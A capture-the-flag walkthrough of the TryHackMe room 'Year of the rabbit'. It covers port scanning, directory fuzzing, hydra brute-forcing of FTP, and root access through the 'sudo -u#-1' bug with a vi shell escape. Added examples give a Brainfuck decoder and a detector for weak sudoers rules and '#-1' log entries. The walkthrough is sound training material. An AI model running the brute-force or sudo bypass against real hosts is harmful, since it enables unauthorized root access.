CatSec.org

Year of the rabbit

In this post, we will look into the room “Year of the rabbit” from TryHackMe, which can be found on https://tryhackme.com

Port scanning

So as always let’s start with some port scanning:

nmap -sV -A $IP

Options:

-A – aggressive scan – runs the default scripts and other common checks, so you can quickly tell what on the host is worth a closer look and what isn't.

-sV – version detection – useful for looking up known vulnerabilities in the detected versions of the running services.

Now let’s see the output:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-09 03:41 EDT
Nmap scan report for 10.10.250.190
Host is up (0.059s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
|   2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
|   256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_  256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
80/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.72 seconds

Anonymous FTP isn’t allowed, so we will enumerate the webserver. We fire up gobuster with the following command:

gobuster dir -u $IP -w /usr/share/wordlists/dirb/common.txt

Options:

dir – set the mode to directory discovery/fuzzing

-u – the target URL

-w – the path to the wordlist

Now we need to wait for gobuster to fuzz the webserver and then we can check the output:

2020/08/09 03:44:16 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.hta (Status: 403)
/assets (Status: 301)
/.htaccess (Status: 403)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2020/08/09 03:44:44 Finished
===============================================================

No interesting directories, so I went through all of them manually just to see. Then in /assets I found two interesting things.

The first one is the popular meme song “Never gonna give you up”, but style.css is the interesting part of this directory. When we open the file we see an interesting comment:

/* Nice to see someone checking the stylesheets.
     Take a look at the page: /**************.php
  */

When I opened the page I was redirected to YouTube, so I fired up Burp to see what’s going on in the PHP file. For Burp we first need to set the proxy in Firefox. This is done by going to Preferences > General (scroll to the bottom) > Network Settings > Advanced and filling in the proxy details there.

Then press OK and open Burp. Now try to open the PHP file again and look at the intercepted traffic:

GET /intermediary.php?hidden_directory=/******** HTTP/1.1
Host: 10.10.250.190
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

You can then switch Firefox back to no proxy and browse to the hidden directory. There is a PNG file that we can download from the webserver with:

wget http://$IP/*******/Hot_Babe.png

Now let’s first run strings on the image:

strings Hot_Babe.png


And BOOM we can see there is a hidden message:

Eh, you've earned this. Username for FTP is ftpuser
One of these is the password:

Then we can redirect the output into a file so we can use hydra to brute-force the FTP login:

strings Hot_Babe.png > pass.txt

We open pass.txt in mousepad so we can delete everything except the passwords. Then we run hydra with the following command:

hydra -l ftpuser -P pass.txt ftp://$IP

And voilà, we got the password, so now we can log in. We see a file named Eli’s_Creds.txt that we can download with the command “get” followed by the filename. When I used cat to view the file I was amazed by this. *I’m pasting part of the content of the file*:

+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+

So I just pasted it into Google and found that this is the Brainfuck language. I used a website to decode it and BOOM, we have a username and password. Now we can use this info for SSH.
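A credentials file does not need to go to a third-party website to be decoded; a Brainfuck interpreter is a few dozen lines. The one below is an added example written for this post (not the room's or the author's code): it ignores the space-separated layout seen in the file above, and since the post only shows part of the real program, SAMPLE is a constructed program that prints "Hi". It assumes the program reads no input.

```python
BF_OPS = "<>+-.,[]"


def build_jump_table(code):
    """Map every '[' to its matching ']' and back; reject unbalanced programs."""
    stack, jumps = [], {}
    for pos, ch in enumerate(code):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise ValueError("unmatched ']' at offset %d" % pos)
            start = stack.pop()
            jumps[start], jumps[pos] = pos, start
    if stack:
        raise ValueError("unmatched '[' at offset %d" % stack[-1])
    return jumps


def run_brainfuck(program, max_steps=1_000_000):
    """Run PROGRAM and return its output as text. Non-command characters (the
    spaces in the post's Eli's_Creds.txt) are ignored, cells are 8-bit and
    wrap, and max_steps stops a program that never terminates."""
    code = "".join(ch for ch in program if ch in BF_OPS)
    jumps = build_jump_table(code)
    tape, ptr, pc, steps, out = [0] * 30_000, 0, 0, 0, []
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded; program may not terminate")
        op = code[pc]
        if op in "<>":
            ptr += 1 if op == ">" else -1
        elif op in "+-":
            tape[ptr] = (tape[ptr] + (1 if op == "+" else -1)) % 256
        elif op == ".":
            out.append(chr(tape[ptr]))
        elif op == ",":
            tape[ptr] = 0            # no stdin here: input reads as EOF -> 0
        elif op == "[" and tape[ptr] == 0:
            pc = jumps[pc]           # skip the loop body
        elif op == "]" and tape[ptr] != 0:
            pc = jumps[pc]           # back to the matching '['
        pc += 1
    return "".join(out)


# Constructed sample in the same space-separated layout as the post's file;
# it prints "Hi" and is NOT the program from the room.
SAMPLE = "+++++ +++[> +++++ ++++< -]>.< +++[> +++++ +++++ +<-]> ."
```

Paste the whole file content into run_brainfuck() and the decoded text comes back as the return value.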

We see a message from gwendoline about a s3cr3t directory. We can use the command “locate” to find it.

locate s3cr3t

#output
/usr/games/s3cr3t
/usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
/var/www/html/sup3r_s3cr3t_fl4g.php

Okay, so now we can cat the secret message. When we do this we see gwendoline’s password, which we can use to SSH in. Let’s do this. Now we can cat the user.txt flag and paste it into TryHackMe.

For root I tried sudo -l to see what we can do and saw that vi can be used, but not with the GTFOBins commands. So then I found a sudo bug: if you specify a user that doesn’t exist, it gives you root. I don’t know why it works like that, but let’s try it. We type:

sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt

Vi will open, so we press “:” and then type “!/bin/sh” and voilà, we got root. Now we can cat the root.txt file.
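The sudo trick above depends on a particular sudoers shape and leaves a trail in the sudo log, which is what a defender looks for. The Python below is an added example (not the post's, the room's or sudo's own code): it flags sudoers rules whose runas list grants ALL but excludes users, and flags sudo log lines whose USER= field is the -1 uid. The post shows neither the room's sudoers line nor its logs, so the "(ALL, !root)" rule and the standard "user : TTY=... ; PWD=... ; USER=... ; COMMAND=..." log format are assumptions, and both samples are constructed.

```python
import re

# Runas part of a sudoers rule, e.g. "(ALL, !root)" -> "ALL, !root"
RUNAS_RE = re.compile(r"\(([^)]*)\)")
# USER= field of a standard sudo syslog line (format assumed, see lead-in)
LOG_USER_RE = re.compile(r"\bUSER=(\S+)")
# uid -1 as sudo accepts it on the command line, plus its unsigned spelling
BAD_RUNAS = {"#-1", "#4294967295"}


def weak_sudoers_rules(sudoers_text):
    """Return rules whose runas user list grants ALL but excludes some users.
    "(ALL, !root)" is the shape the -u#-1 trick needs: uid -1 is not "root"
    to the rule, yet the command ends up running as root. The fix is to name
    the permitted runas users explicitly instead of blacklisting root."""
    weak = []
    for raw in sudoers_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):   # comments and #include lines
            continue
        m = RUNAS_RE.search(line)
        if not m:
            continue
        user_list = [u.strip() for u in m.group(1).split(":")[0].split(",")]
        if "ALL" in user_list and any(u.startswith("!") for u in user_list):
            weak.append(line)
    return weak


def suspicious_sudo_log_lines(log_lines):
    """Return sudo log lines whose requested runas user is the -1 uid."""
    hits = []
    for line in log_lines:
        m = LOG_USER_RE.search(line)
        if m and m.group(1) in BAD_RUNAS:
            hits.append(line)
    return hits


# Constructed samples modelled on the post's scenario; the room's actual
# sudoers line and logs are not shown in the post.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed)
root        ALL=(ALL:ALL) ALL
gwendoline  ALL=(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
"""
SAMPLE_LOG = [
    "Aug  9 03:50:12 rabbit sudo: gwendoline : TTY=pts/0 ; PWD=/home/gwendoline ;"
    " USER=#-1 ; COMMAND=/usr/bin/vi /home/gwendoline/user.txt",
    "Aug  9 03:51:40 rabbit sudo: gwendoline : TTY=pts/0 ; PWD=/home/gwendoline ;"
    " USER=root ; COMMAND=/usr/bin/vi /home/gwendoline/user.txt",
]
```

Upgrading sudo removes the bug itself; rewriting the rule as an explicit allow-list of runas users removes the precondition even on an unpatched host.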